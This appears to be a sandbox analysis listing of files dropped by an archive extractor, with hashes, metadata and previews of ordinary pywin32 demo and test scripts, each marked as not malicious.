                                                                                                                                                                                      SSDEEP:48:Zy02jhZ2V6v5kHEETdZUCOxtVbpVRN9H1Vbd0OVyVbrqVbH0:Z6jmAvUEEZZUFt7N9H1P/y1ql0
                                                                                                                                                                                      MD5:741D38BEDF1C869EE787FC7ACAEC0021
                                                                                                                                                                                      SHA1:13E733C166A8FDAFC61199E18B7D5E5D1CC5E8C7
                                                                                                                                                                                      SHA-256:61E15FB3EBAB14C07BD6085672916195BA13259BFEE3E7DD4C6EF8DE99CF0BBB
                                                                                                                                                                                      SHA-512:0B27730E1FEB8E10E03664789A588B8BA0B9E7B3D07F328B0E87C6F3A597B74A40A6BF9654A66035071C013D37EF543A65EAC0D4DFE074F4C6DE3FEDF655EA4C
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:import win32api.import win32con.import win32transaction..keyname = "Pywin32 test transacted registry functions".subkeyname = "test transacted subkey".classname = "Transacted Class"..trans = win32transaction.CreateTransaction(Description="test RegCreateKeyTransacted").key, disp = win32api.RegCreateKeyEx(. win32con.HKEY_CURRENT_USER,. keyname,. samDesired=win32con.KEY_ALL_ACCESS,. Class=classname,.).## clean up any existing keys.for subk in win32api.RegEnumKeyExW(key):. win32api.RegDeleteKey(key, subk[0])..## reopen key in transacted mode.transacted_key = win32api.RegOpenKeyTransacted(. Key=win32con.HKEY_CURRENT_USER,. SubKey=keyname,. Transaction=trans,. samDesired=win32con.KEY_ALL_ACCESS,.).subkey, disp = win32api.RegCreateKeyEx(. transacted_key,. subkeyname,. Transaction=trans,. samDesired=win32con.KEY_ALL_ACCESS,. Class=classname,.)..## Newly created key should not be visible from non-transacted handle.subkeys = [s[0] for s in win32api.RegEnu
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2063
                                                                                                                                                                                      Entropy (8bit):5.11300797395737
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:01b8JS3KmpnnP7iS8sE2Nzp6De+/L6ye+2mMvHwzpbA+exs:+b8JwKmpPX8sJzpse+/eye+2mMPwzpcG
                                                                                                                                                                                      MD5:1BE4DC6030AA23DD32D4E7CAD3A1F0D8
                                                                                                                                                                                      SHA1:49F6308BF8E3A6F7D765B699A02F17393EBE2FB0
                                                                                                                                                                                      SHA-256:B02E9C41D6E51EBE3926C1746E5372E62AC2613F847FFF95C5D6F9EA368572DF
                                                                                                                                                                                      SHA-512:6D78179DBE0CABE9A2EEDD9FBFDDD0BD33B2A397E0D48AB05AFA4970424E22F4C262526E489FBB26B7565A43764D7CCEE8BD827FF09FFF4106E334DFCAE453D6
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:import os..import ntsecuritycon.import win32api.import win32con.import win32security.import winnt..temp_dir = win32api.GetTempPath().fname = win32api.GetTempFileName(temp_dir, "rsk")[0].print(fname).## file can't exist.os.remove(fname)..## enable backup and restore privs.required_privs = (. (. win32security.LookupPrivilegeValue("", ntsecuritycon.SE_BACKUP_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),. (. win32security.LookupPrivilegeValue("", ntsecuritycon.SE_RESTORE_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),.).ph = win32api.GetCurrentProcess().th = win32security.OpenProcessToken(. ph, win32con.TOKEN_READ | win32con.TOKEN_ADJUST_PRIVILEGES.).adjusted_privs = win32security.AdjustTokenPrivileges(th, 0, required_privs)..try:. sa = win32security.SECURITY_ATTRIBUTES(). my_sid = win32security.GetTokenInformation(th, ntsecuritycon.TokenUser)[0]. sa.SECURITY_DESCRIPTOR.SetSecurityDescriptorOwner(my_sid, 0).. k, disp = win32api.RegCreateKeyEx(
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):7957
                                                                                                                                                                                      Entropy (8bit):5.388617419802842
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:3jwj8c3w/SDwculj0wyi+Brwx6yO15ulj0PwxH/sZ003arjrarVyz9ovDkMq/nqf:leZDBA695ZkH/sX3+xFcXcvff0vt0vk
                                                                                                                                                                                      MD5:E9EFEB93CB39D5E58DC872610C559C9B
                                                                                                                                                                                      SHA1:E857D85B5FCE044393BB761C2066D5C6D80DB517
                                                                                                                                                                                      SHA-256:B57538B210D4FD23437E3F0F9FCDA52FDA038F6CCB7E3BF4DB626D2C3EF8F200
                                                                                                                                                                                      SHA-512:3B48E942370DBD06744B114DCDB230096E3AAACBA426A95F0361B10D780CDBD11188837490EECECE37C1940CE2216A6AC95D63287E10699DC19E4F88FA972D0A
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:import glob.import os.import time..import win32api.import win32con.import win32gui..## some of these tests will fail for systems prior to XP..for pname in (. ## Set actions all take an unsigned int in pvParam. "SPI_GETMOUSESPEED",. "SPI_GETACTIVEWNDTRKTIMEOUT",. "SPI_GETCARETWIDTH",. "SPI_GETFOREGROUNDFLASHCOUNT",. "SPI_GETFOREGROUNDLOCKTIMEOUT",. ## Set actions all take an unsigned int in uiParam. "SPI_GETWHEELSCROLLLINES",. "SPI_GETKEYBOARDDELAY",. "SPI_GETKEYBOARDSPEED",. "SPI_GETMOUSEHOVERHEIGHT",. "SPI_GETMOUSEHOVERWIDTH",. "SPI_GETMOUSEHOVERTIME",. "SPI_GETSCREENSAVETIMEOUT",. "SPI_GETMENUSHOWDELAY",. "SPI_GETLOWPOWERTIMEOUT",. "SPI_GETPOWEROFFTIMEOUT",. "SPI_GETBORDER",. ## below are winxp only:. "SPI_GETFONTSMOOTHINGCONTRAST",. "SPI_GETFONTSMOOTHINGTYPE",. "SPI_GETFOCUSBORDERHEIGHT",. "SPI_GETFOCUSBORDERWIDTH",. "SPI_GETMOUSECLICKLOCKTIME",.):. print(pname). cget = getattr(win32con, pname). cset =
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):767
                                                                                                                                                                                      Entropy (8bit):4.806261092723215
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:12:h2BqulhxkNMdtNDf4wqWDD1JGACGiT9nibQOK0+68oa3USS2sidBHS82q5Vcg0kS:hHujKMlEwq6rCnZib7EosEK35mg0cm
                                                                                                                                                                                      MD5:1A58DDE5C50B46C1D1F8EA2DFC5864C0
                                                                                                                                                                                      SHA1:97132512402D2EB34AC1D098BC7FFC4777BFDBD7
                                                                                                                                                                                      SHA-256:25D58FD5E6D02A1DD5EE74E07446D8F16C0F1BFE244B26EF33E0D44FE75EE6F3
                                                                                                                                                                                      SHA-512:4FCB571603C1AA1083ABAB5B7EC67C32B6FD2AA06AEC74B3F15276C61D828E9F2666F2871E48673B24B4E0EA2864ECB8B391F622FCC2EC6FCE20262C9FA62082
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# A sample distutils script to show to build your own.# extension module which extends pywintypes or pythoncom..#.# Use 'python setup.py build' to build this extension..import os.from distutils.core import Extension, setup.from sysconfig import get_paths..sources = ["win32_extension.cpp"].lib_dir = get_paths()["platlib"]..# Specify the directory where the PyWin32 .h and .lib files are installed..# If you are doing a win32com extension, you will also need to add.# win32com\Include and win32com\Libs..ext = Extension(. "win32_extension",. sources,. include_dirs=[os.path.join(lib_dir, "win32", "include")],. library_dirs=[os.path.join(lib_dir, "win32", "libs")],.)..setup(. name="win32 extension sample",. version="0.1",. ext_modules=[ext],.).
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):7919
                                                                                                                                                                                      Entropy (8bit):4.65097395781897
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:9H9Yc+w3MkDGXmimgbbxpgMCxOo5EBrjm8TRd6i:9HbEDfbgxWR
                                                                                                                                                                                      MD5:6A35220B5A6D51EFDA6A0149AB846E42
                                                                                                                                                                                      SHA1:51A99F41083A92C1331E4DF817BBC0D6C9FAD7F3
                                                                                                                                                                                      SHA-256:7BC6B2F12435DAD24854E120E4D9426269C1FD5A65C8F8BD1B5EB1B1BCACCF96
                                                                                                                                                                                      SHA-512:4324DBB3D41B1DA26F4D78A0706EE4A41A0BCCDD7EFD5C626556C459E95A25302B3684BD6AC9AAAF0C5FEFE81B9C91674D82E17DD03CC4FD90744E5D55A03558
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# A demo of the Windows CE Remote API.#.# This connects to a CE device, and interacts with it...import getopt.import os.import sys..import win32api.import win32con.import win32event.import wincerapi...def DumpPythonRegistry():. try:. h = wincerapi.CeRegOpenKeyEx(. win32con.HKEY_LOCAL_MACHINE,. "Software\\Python\\PythonCore\\%s\\PythonPath" % sys.winver,. ). except win32api.error:. print("The remote device does not appear to have Python installed"). return 0. path, typ = wincerapi.CeRegQueryValueEx(h, None). print("The remote PythonPath is '%s'" % (str(path),)). h.Close(). return 1...def DumpRegistry(root, level=0):. # A recursive dump of the remote registry to test most functions.. h = wincerapi.CeRegOpenKeyEx(win32con.HKEY_LOCAL_MACHINE, None). level_prefix = " " * level. index = 0. # Enumerate values.. while 1:. try:. name, data, typ = wincerapi.CeRegEnumValue(root, index).
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):434
                                                                                                                                                                                      Entropy (8bit):4.946201052398342
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:12:ggRALa3M6AwMT2BthR9Do1BOiw+VLu9yMr+:h5zAfEh5V+A9dr+
                                                                                                                                                                                      MD5:2D792963A25E0425CEB0E4EBA9533610
                                                                                                                                                                                      SHA1:73775E1E6143D54E131BC8BCD5F6B9B8D722B1A9
                                                                                                                                                                                      SHA-256:DFE50A175652A73619BD31ED5A03567F38B1F4F9B0654273DA0072335A181D0B
                                                                                                                                                                                      SHA-512:0F8DB0BF6A83E0BFD4DB14AF288668E1FFC24E488CCBBC6A098522C19F22F991F90F92D95050E74B82EEF449C1A17E537ABC40F7572D1F2A6A801B134718E95C
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# 'Request' example added jjk 11/20/98..import dde.import win32ui..server = dde.CreateServer().server.Create("TestClient")..conversation = dde.CreateConversation(server)..conversation.ConnectTo("RunAny", "RunAnyCommand").conversation.Exec("DoSomething").conversation.Exec("DoSomethingElse")..conversation.ConnectTo("RunAny", "ComputeStringLength").s = "abcdefghi".sl = conversation.Request(s).print('length of "%s" is %s' % (s, sl)).
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1093
                                                                                                                                                                                      Entropy (8bit):4.931498351786163
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:hhtBDAVAasXt8ABeuAf6dABenvAnD4AWbCQov1tX6QK:zD4YXt8Yeua2YenvAnkvbCQov1tX+
                                                                                                                                                                                      MD5:3F9B69FE31E611D153BE7DF14BAF4C0D
                                                                                                                                                                                      SHA1:B2ABC26EC0E8C5C849873A3EBC65D14555279B1B
                                                                                                                                                                                      SHA-256:BDB3478C65F4F8AE8FD7AF89F87C8BD24EAC5B92B9146E4A42E699CAC6342B5A
                                                                                                                                                                                      SHA-512:94FCF00EFA048DCE40A2753BE45CC8C9C475893BD1DBD2C050631C877A097E5FAEFAE1A34B47099C6C14B000DFAFF6EE4F7864250F8A4FE7D5A1230ABAB8E18E
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# 'Request' example added jjk 11/20/98..import dde.import win32ui.from pywin.mfc import object...class MySystemTopic(object.Object):. def __init__(self):. object.Object.__init__(self, dde.CreateServerSystemTopic()).. def Exec(self, cmd):. print("System Topic asked to exec", cmd)...class MyOtherTopic(object.Object):. def __init__(self, topicName):. object.Object.__init__(self, dde.CreateTopic(topicName)).. def Exec(self, cmd):. print("Other Topic asked to exec", cmd)...class MyRequestTopic(object.Object):. def __init__(self, topicName):. topic = dde.CreateTopic(topicName). topic.AddItem(dde.CreateStringItem("")). object.Object.__init__(self, topic).. def Request(self, aString):. print("Request Topic asked to compute length of:", aString). return str(len(aString))...server = dde.CreateServer().server.AddTopic(MySystemTopic()).server.AddTopic(MyOtherTopic("RunAnyCommand")).server.AddTopic(MyRequestTopic("Com
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):8141
                                                                                                                                                                                      Entropy (8bit):4.832909840782592
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:DTaWV0QcMBmT0KvPyS8271m87r8s8pFq46wo7j5bpad0/d:DVcRDr8271murH546wOj5bpae/d
                                                                                                                                                                                      MD5:FF37EA7B3799F4BD22071D7DCB0C7FC7
                                                                                                                                                                                      SHA1:59C09297374FC5AC1EF12A9E4DC8C5E6494F0B7C
                                                                                                                                                                                      SHA-256:D7A85B4943DFC4F90973D46EF55DBEE8642BB24177EF95E561D5AFDD7462E018
                                                                                                                                                                                      SHA-512:072ABEDC346D3F13DCA1026F854915EB38D5A476E30E349A6C16C41DF852BD217001B52F84A00693FEECC8FAB94849C8B93104F43843C796872A0A908DDA26C9
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# Demonstrates using a taskbar icon to create and navigate between desktops..import _thread.import io.import time.import traceback..import pywintypes.import win32api.import win32con.import win32gui.import win32process.import win32service..## "Shell_TrayWnd" is class of system tray window, broadcasts "TaskbarCreated" when initialized...def desktop_name_dlgproc(hwnd, msg, wparam, lparam):. """Handles messages from the desktop name dialog box""". if msg in (win32con.WM_CLOSE, win32con.WM_DESTROY):. win32gui.DestroyWindow(hwnd). elif msg == win32con.WM_COMMAND:. if wparam == win32con.IDOK:. desktop_name = win32gui.GetDlgItemText(hwnd, 72). print("new desktop name: ", desktop_name). win32gui.DestroyWindow(hwnd). create_desktop(desktop_name).. elif wparam == win32con.IDCANCEL:. win32gui.DestroyWindow(hwnd)...def get_new_desktop_name(parent_hwnd):. """Create a dialog box to ask the user for name of desktop
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):4421
                                                                                                                                                                                      Entropy (8bit):4.394676077658835
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:9Gs7qeCumrvPFWj9uOLTzMfOkqJq3NZMm5mmPFPgjX:9Gs7qenovPFWsGTYAtmPFPgjX
                                                                                                                                                                                      MD5:A787AB4A5D05E3A55541E621CC5FA92B
                                                                                                                                                                                      SHA1:8212FEA481713144E60BC21F5AF8138955F65FF4
                                                                                                                                                                                      SHA-256:26001027A54ABA3A92CD496D7AC0799BCB595C8B77E98FFA04E74F2CFFDCA113
                                                                                                                                                                                      SHA-512:6AC6087DEAE2958DF2192312E05A89AAE6AC14D9E9AFAB844D218A20D1729CC0A0D6B8CCC9E5BF4115F5529FFB0BBCF0B3AAC05BC4710C9DE9941CE0B57EBCF5
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:import win32api # To translate NT Sids to account names..import win32con.import win32evtlog.import win32evtlogutil.import win32security...def ReadLog(computer, logType="Application", dumpEachRecord=0):. # read the entire log back.. h = win32evtlog.OpenEventLog(computer, logType). numRecords = win32evtlog.GetNumberOfEventLogRecords(h). # print "There are %d records" % numRecords.. num = 0. while 1:. objects = win32evtlog.ReadEventLog(. h,. win32evtlog.EVENTLOG_BACKWARDS_READ | win32evtlog.EVENTLOG_SEQUENTIAL_READ,. 0,. ). if not objects:. break. for object in objects:. # get it for testing purposes, but dont print it.. msg = win32evtlogutil.SafeFormatMessage(object, logType). if object.Sid is not None:. try:. domain, user, typ = win32security.LookupAccountSid(. computer, object.Sid. )
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1126
                                                                                                                                                                                      Entropy (8bit):4.847240732987727
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:j4TypXUFzmG73wIujOHRuMxqNclmIIzSrNyNHD4couDZgAuwsIo:aQXUDsILuMxXlmIoGYHxouDZHHsIo
                                                                                                                                                                                      MD5:4F0AC86AB91546ECFCD2EAEFEC6A9516
                                                                                                                                                                                      SHA1:847E7F42C9D282A1B8A7DFBEF8918341B76CFD75
                                                                                                                                                                                      SHA-256:6DB2C4E7E5D5EFB2673FD1860F51627F0B84DB21A68AC331C51B3AFB41F7B684
                                                                                                                                                                                      SHA-512:7A41AB6EE47275F89BEC82CE0EF9C6D417E88DCC094C653F95D1ABB88E6FC3FBA4F96A423071A32FEB2A3A8DD2D8AC1CBC9E2A33DA4C917ED234F347D1CB987D
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:import os..import win32api..ver_strings = (. "Comments",. "InternalName",. "ProductName",. "CompanyName",. "LegalCopyright",. "ProductVersion",. "FileDescription",. "LegalTrademarks",. "PrivateBuild",. "FileVersion",. "OriginalFilename",. "SpecialBuild",.).fname = os.environ["comspec"].d = win32api.GetFileVersionInfo(fname, "\\").## backslash as parm returns dictionary of numeric info corresponding to VS_FIXEDFILEINFO struc.for n, v in d.items():. print(n, v)..pairs = win32api.GetFileVersionInfo(fname, "\\VarFileInfo\\Translation").## \VarFileInfo\Translation returns list of available (language, codepage) pairs that can be used to retreive string info.## any other must be of the form \StringfileInfo\%04X%04X\parm_name, middle two are language/codepage pair returned from above.for lang, codepage in pairs:. print("lang: ", lang, "codepage:", codepage). for ver_string in ver_strings:. str_info = "\\StringFileInfo\\%04X%04X\\%s" % (lang,
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:PC bitmap, Windows 3.x format, 32 x 32 x 24, image size 3072, cbSize 3126, bits offset 54
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):3126
                                                                                                                                                                                      Entropy (8bit):4.866601281143834
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:QJbd92m1SGlnHZ4Yuu5I/p/UdCHMaVU42PVA0O0JR0Rj70Rp0OCv0QQH080D9m:QJbd911zlq/5JFj2NU6xyv9m
                                                                                                                                                                                      MD5:67D3F80FA18D9298FB9BD346BF1905F3
                                                                                                                                                                                      SHA1:8528E2B4B8E8681828518337925D2876809B7454
                                                                                                                                                                                      SHA-256:4601AF795B74E772A5995E2A546C1D0ADACFC91034253E7B290BDFF4F34E22F5
                                                                                                                                                                                      SHA-512:F52A0DF170AF6E1A43947C66EE5C97B9A2A7669A21FDABA24490CB97C5FD8450920E79AA2205D3E11DD7484D2CE95FAA7043D621E278025A9081C5F060BA7347
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:BM6.......6...(... ... ...........................................................................................................................................................................................................................................................................................@..@............................................................................................@..@........................................................................................."..$..&.... .. ..*..*.............................................................................."..$.... .. ..*..*....................................#.$#.$......................................."..$..&..)..+......................................#.$#.$.........................................."..$..&..)........................................................................................."..$..&..)..+................................$....................................................."..$..&..)
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:PC bitmap, Windows 3.x format, 32 x 32 x 24, image size 3072, cbSize 3126, bits offset 54
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):3126
                                                                                                                                                                                      Entropy (8bit):4.039217657290414
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:i27oH9YEJtIq0Q0x0P0n5Z0wZaG0WQv0NN0C0nw:dfRYw
                                                                                                                                                                                      MD5:CA4F178B4A665A1DA21AEA80C7E796F7
                                                                                                                                                                                      SHA1:3A7E64ADC019F45290C43B04E6A1072A55470586
                                                                                                                                                                                      SHA-256:C22E778D80B2E76DDF1588FF1588331B577141D12BC3EA30DBFFDD7E85FD82C0
                                                                                                                                                                                      SHA-512:97BDC1BAE0FAC2582ABF11F318937318D33EFF1664CCE499C4D95316A25CB87B0599E9E4CAA5D911B0F465E4F491A4E2F23E4EE87E14D9A0C8CE1FD6150982E9
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:BM6.......6...(... ... .................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................#.$#.$..........................................................................................#.$#.$..........................................................................................................................................................................................$...............................................................
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script text executable Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2888
                                                                                                                                                                                      Entropy (8bit):4.8375775005209265
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:knDxrrsqXh6/6LCN8Czanw7IbHbfqVGvr7lFqkVlL7ukeTX1:knDxrrTXg/6LC3GsKbfqVGjPqG3c1
                                                                                                                                                                                      MD5:A333358AEA4B17F65D614B8ABFE55ED4
                                                                                                                                                                                      SHA1:94F0486D40A0D9A6C65AE10CDD78122B37DB7F24
                                                                                                                                                                                      SHA-256:FFED0CEB4B51A0800A19600776E389A112E465E842BCFC98EDE1E8426AF0DF5F
                                                                                                                                                                                      SHA-512:F6B99C26C726D736A119AA10A4907AB61E8FA36CBB138EC7FAFBAD1E68A55BFC78F300B214639C7BB25F0DD1F6810F8E1AE7A1DE4C23FF43917C3E22A59AA45B
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:import os.import tempfile..import mmapfile.import win32api.import winerror.from pywin32_testutil import str2bytes..system_info = win32api.GetSystemInfo().page_size = system_info[1].alloc_size = system_info[7]..fname = tempfile.mktemp().mapping_name = os.path.split(fname)[1].fsize = 8 * page_size.print(fname, fsize, mapping_name)..m1 = mmapfile.mmapfile(File=fname, Name=mapping_name, MaximumSize=fsize).m1.seek(100).m1.write_byte(str2bytes("?")).m1.seek(-1, 1).assert m1.read_byte() == str2bytes("?")..## A reopened named mapping should have exact same size as original mapping.m2 = mmapfile.mmapfile(Name=mapping_name, File=None, MaximumSize=fsize * 2).assert m2.size() == m1.size().m1.seek(0, 0).m1.write(fsize * str2bytes("s")).assert m2.read(fsize) == fsize * str2bytes("s")..move_src = 100.move_dest = 500.move_size = 150..m2.seek(move_src, 0).assert m2.tell() == move_src.m2.write(str2bytes("m") * move_size).m2.move(move_dest, move_src, move_size).m2.seek(move_dest, 0).assert m2.read(move_s
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):335
                                                                                                                                                                                      Entropy (8bit):4.496864057756722
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:6:9Msoe/ErAzXKkYHPUHyHmYTR7VgWxvyLW3StbYTR7Vf3v//ZeSZ/XJXrdiLUs6:OVe/EUTbZHyHmYTbvvebYTb/v/tJ7gL4
                                                                                                                                                                                      MD5:9958EDE52157CBF9F56DFF07C4499108
                                                                                                                                                                                      SHA1:5D1EABF96A11361804DDA8FB94BF9E3E902FA540
                                                                                                                                                                                      SHA-256:DA45A4922FA32C3668876043811CCCC43198C89C263B17FBD3CDE4BDDD988496
                                                                                                                                                                                      SHA-512:575187E4345C37B119838503400E938560BF5AAEE2B6CAAA62835BAC76EA832DC06E779C35EE898748116FA69807ABA580D5462490BE7738E2BC029E9855FBC1
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""cat.py.a version of unix cat, tweaked to show off runproc.py."""..import sys..data = sys.stdin.read(1).sys.stdout.write(data).sys.stdout.flush().while data:. data = sys.stdin.read(1). sys.stdout.write(data). sys.stdout.flush().# Just here to have something to read from stderr..sys.stderr.write("Blah...")..# end of cat.py.
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):4029
                                                                                                                                                                                      Entropy (8bit):4.550391036233513
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:qG4T/T68SbTXy62/K+KovQtw6guU/Tm3Z+Bo2x:qbLgXy6WKcHIEig
                                                                                                                                                                                      MD5:EA0603E314B6C0CB3396B100E9AA1A2C
                                                                                                                                                                                      SHA1:FE3D6C231A64E599C31582F58FD2B45C014C728B
                                                                                                                                                                                      SHA-256:837AADE7BA490576FD507189F3BDA6EB0521F56EF44822A8BCD1057D1E271F08
                                                                                                                                                                                      SHA-512:3A58C4569855F08E252D5C339A6B80308EA1FAD4168E9F50B9387631CFC118DEAD08F56DFA8D718614A24FC17F956637DEB10F36CAC95711C5A2A757941049DE
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""runproc.py..start a process with three inherited pipes..Try to write to and read from those.."""..import msvcrt.import os..import win32api.import win32con.import win32file.import win32pipe.import win32process.import win32security...class Process:. def run(self, cmdline):. # security attributes for pipes. sAttrs = win32security.SECURITY_ATTRIBUTES(). sAttrs.bInheritHandle = 1.. # create pipes. hStdin_r, self.hStdin_w = win32pipe.CreatePipe(sAttrs, 0). self.hStdout_r, hStdout_w = win32pipe.CreatePipe(sAttrs, 0). self.hStderr_r, hStderr_w = win32pipe.CreatePipe(sAttrs, 0).. # set the info structure for the new process.. StartupInfo = win32process.STARTUPINFO(). StartupInfo.hStdInput = hStdin_r. StartupInfo.hStdOutput = hStdout_w. StartupInfo.hStdError = hStderr_w. StartupInfo.dwFlags = win32process.STARTF_USESTDHANDLES. # Mark doesn't support wShowWindow yet.. # StartupInfo.dwFla
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2859
                                                                                                                                                                                      Entropy (8bit):5.16397412167526
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:3Iusl8P/XKhIH+DvhcqR1sPH8C72hDhKqMhKNtwKGzQigwFz3rYA/9:3IuslyfJ+9NR1OOAQihz3rYA/9
                                                                                                                                                                                      MD5:6358F39A6DC68902315A154AA803745C
                                                                                                                                                                                      SHA1:32C7399756A96B1A7EC0CEC7708713B7A7B5A904
                                                                                                                                                                                      SHA-256:008B4576E46966832603683F16735B22AD0950969DFA362FF593E169C665EB12
                                                                                                                                                                                      SHA-512:F8492FE12112BA5F792D30E733F7530D40F1B0A4E39A2970CD70B3785B3EE68B3CF86B1E8DFFEDD949F1CE4718AA80CEC2E433076D416E6B9E2C71273A5C3968
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
